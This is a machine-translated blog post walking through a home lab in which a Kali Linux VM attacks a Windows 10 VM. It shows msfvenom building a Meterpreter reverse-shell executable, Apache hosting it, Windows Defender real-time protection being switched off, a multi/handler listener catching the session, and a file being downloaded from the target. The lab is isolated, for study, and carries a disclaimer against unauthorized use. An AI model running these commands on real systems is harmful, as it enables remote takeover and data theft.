[LINUX] First Windows 10 hack

I want to know the attack method and become a person with high security awareness. Because it's in front of the building, hackers are cool, aren't they? I started practicing hacking with the motive.

It is the 4th day of the Advent calendar of PRO Co., Ltd. It's not about making something, but please forgive me for saying "I wish I had it!" ...

things to do

Build a Windows experimental environment with a VM, and attack and remotely control it from another environment (Kali Linux). It's longer, but there are more images.

* No, absolutely.

This article does not recommend cyber attacks such as unauthorized access. Please do not apply the contents introduced here to the external environment.

prepare

First, build an attack terminal and a target terminal with a VM. This time, it was done in the following environment.

--Host OS: macOS 10.15.2 Beta --Guest OS --Attack terminal: Kali Linux 5.3.0-kali2-amd64 --Target terminal: Windows 10 --Virtualization software: VirtualBox 6.0.14 r133895 (Qt5.6.3)

Building an attack environment

Kali Linux is a Linux distribution used for penetration testing. It is based on Debian and comes pre-installed with over 300 penetration testing tools.

I will use Kali Linux this time, but it is okay to install the attack tool on the OS you are familiar with.

Installing Kali Linux

Download the Kali Linux image from the following page. https://www.kali.org/downloads/ This time, I downloaded "Kali Linux 64-Bit".

In this article, I will omit the detailed installation method.

Building an experimental Windows environment

Download Windows 10 image

Download the Windows 10 ISO file from the following page. https://www.microsoft.com/ja-jp/software-download/windows10ISO

VM creation

Create a virtual machine from a new VirtualBox. スクリーンショット 2019-12-01 20.42.31.png スクリーンショット 2019-12-01 20.43.16.png スクリーンショット 2019-12-01 20.43.43.png スクリーンショット 2019-12-01 20.43.58.png スクリーンショット 2019-12-01 20.44.35.png スクリーンショット 2019-12-01 20.44.55.png スクリーンショット 2019-12-01 20.45.06.png It's done.

Installation & setup

--Start the Windows 10 virtual machine. --Select the installed ISO file on the "Select Boot Hard Disk" screen. --Proceed with the initial settings according to the screen. Click "No product key" on the activation screen. スクリーンショット 2019-12-01 20.56.20のコピー.png For the installation type, select "Custom: Install Windows only". スクリーンショット 2019-12-01 20.58.06.png On the authentication screen, click "Offline account" to prevent the motivation file from being synchronized with other Windows devices. スクリーンショット 2019-12-01 21.17.42のコピー.png Disable all in the device privacy settings selection. スクリーンショット 2019-12-01 21.24.02.png If the desktop screen is displayed, the setting is complete.

--Remove ISO file from virtual drive Quit Windows 10 once and open VirtualBox Settings> Storage. Click the disk icon to the right of the optical drive and select Remove Disk from Virtual Drive. スクリーンショット 2019-12-01 22.06.23.png

You're ready to go!

Attack (main story)

This attack experiment will be conducted in the following environment. The attack terminal and the target terminal are in the same network.

Terminal IP address
Kali Linux (attack terminal) 10.0.0.2
Windows10 (target terminal) 10.0.0.102

Allow control of the target device from the attacking device

Create a reverse shell in Metasploit Framework and run it on the target device.

What is Metasploit Framework?

It is an open source penetration testing tool that can perform a series of server intrusions such as investigation, intrusion, attack, and backdoor installation / connection. It is provided by default on Kali Linux.

Payload creation

A payload is an executable code that behaves maliciously. This time, we will create a TCP reverse shell payload.

The following command will create a TCP reverse shell targeting 64-bit windows and specifying the connection destination as the attack terminal (10.0.0.2).

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe

Make the executable file accessible from the outside

The created payload needs to be executed by the target terminal in some way. This time, start Apache so that it can be accessed from the browser of the target terminal.

# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart

Have the target device download the payload

Access http://10.0.0.2/share from the browser on the windows10 side. スクリーンショット 2019-12-04 7.37.36.png

I have confirmed that evil.exe exists, so I will download it.

When I clicked evil.exe and chose to run it, it failed because it was detected as a virus by Windows Defender Antivirus. スクリーンショット 2019-12-04 7.40.05.png

Clicking on the notification at the bottom right reveals the name Trojan, which I've heard, and I'm a little excited. スクリーンショット 2019-12-04 8.14.08.png

When I selected "Allow" from "Operation" and tried to save it again, the display changed. In this state, click Run to save. スクリーンショット 2019-12-04 8.14.42.png

Then turn off "real-time protection" in the Windows Defender Security Center and download again. スクリーンショット 2019-12-04 8.19.15.png Please refer to here (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503) for the detailed setting method.

スクリーンショット 2019-12-04 8.21.39.png This time, the download was successful without any warning.

When you open the folder, you can see that there are two files, one saved when real-time protection is on (evil.exe) and one saved when real-time protection is off (evil (1) .exe). スクリーンショット 2019-12-04 8.28.52.png

Wait for the reverse shell on the attacking side

Execute the following command on the attacking terminal and wait for the connection by the reverse shell.

# msfconsole      <----input
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v5.0.62-dev                          ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]


 msf5> use exploit / multi / handler <---- input
 msf5 exploit (multi / handler)> set payload windows / x64 / meterpreter / reverse_tcp <---- input
payload => windows/x64/meterpreter/reverse_tcp
 msf5 exploit (multi / handler)> set LHOST 10.0.0.2 <---- input
LHOST=>10.0.0.2
 msf5 exploit (multi / handler)> exploit -j -z <---- input
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

 [*] Started reverse TCP handler on 10.0.0.2: 4444 <---- Start listening
msf5 exploit(multi/handler) > 

###Run the payload on the target terminal

Execute the payload on the Windows side. The one downloaded when real-time protection is on and the one downloaded when real-time protection is off are executed a total of four times in the pattern of the real-time protection on and off, respectively.

[When downloading]
Real-time protection enabled
(evil.exe)
[When downloading]
Real-time protection disabled
(evil(1).exe)
【runtime】
Real-time protection enabled
Attack failure Attack failure
【runtime】
Real-time protection disabled
Attack failure Successful attack

All of them give a warning at runtime, but details>Forcibly execute by execution. Screenshot 2019-12-04 9.00.17.png

Click here for the screen at the time of failure. Screenshot 2019-12-04 9.03.19.png

If successful, the following will be displayed on the attacking console.

msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900

In this state, press Enter and then use the sessions command to display the session list.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  2         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)

Attack environment (10.0.0.2) to target environment (10).0.0.The connection to 102) was confirmed.

###Remote control at Meterpreter prompt

Then password for experiment.Create a txt file on the Windows side. Screenshot 2019-12-04 9.16.07.png

Display the Meterpreter prompt by specifying the session ID on the attacker side.

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 

password.Find and download txt.

meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-12-01 21:24:25 +0900  desktop.ini
100777/rwxrwxrwx  7168  fil   2019-12-04 08:21:32 +0900  evil (1).exe
100777/rwxrwxrwx  7168  fil   2019-12-04 09:07:02 +0900  evil.exe
100666/rw-rw-rw-  8     fil   2019-12-04 09:15:30 +0900  password.txt

meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download   : password.txt -> password.txt
meterpreter > 

Open another terminal and make sure you have downloaded it.

root@kali:~# ls -la password.txt 
-rw-r--r-- 1 root root 8 Dec  4 09:15 password.txt

I was able to download it safely (?)! !!

#Summary

I used Kali Linux to attack Windows 10 and conducted remote control experiments. It was surprising that it was easier than I expected. Personally, I think it's a harvest to realize that Windows Defender is doing a good job.

The next step is to create a backdoor, spoof the payload, and much more, so I might write more.

#Reference book

IPUSIRON "How to make a hacking lab: hacker experience learning in a virtual environment" Shoeisha (amazon)

Recommended Posts

First Windows 10 hack
Continued, first Windows 10 hacking
First Flask
First draft
First python-review-
First gdb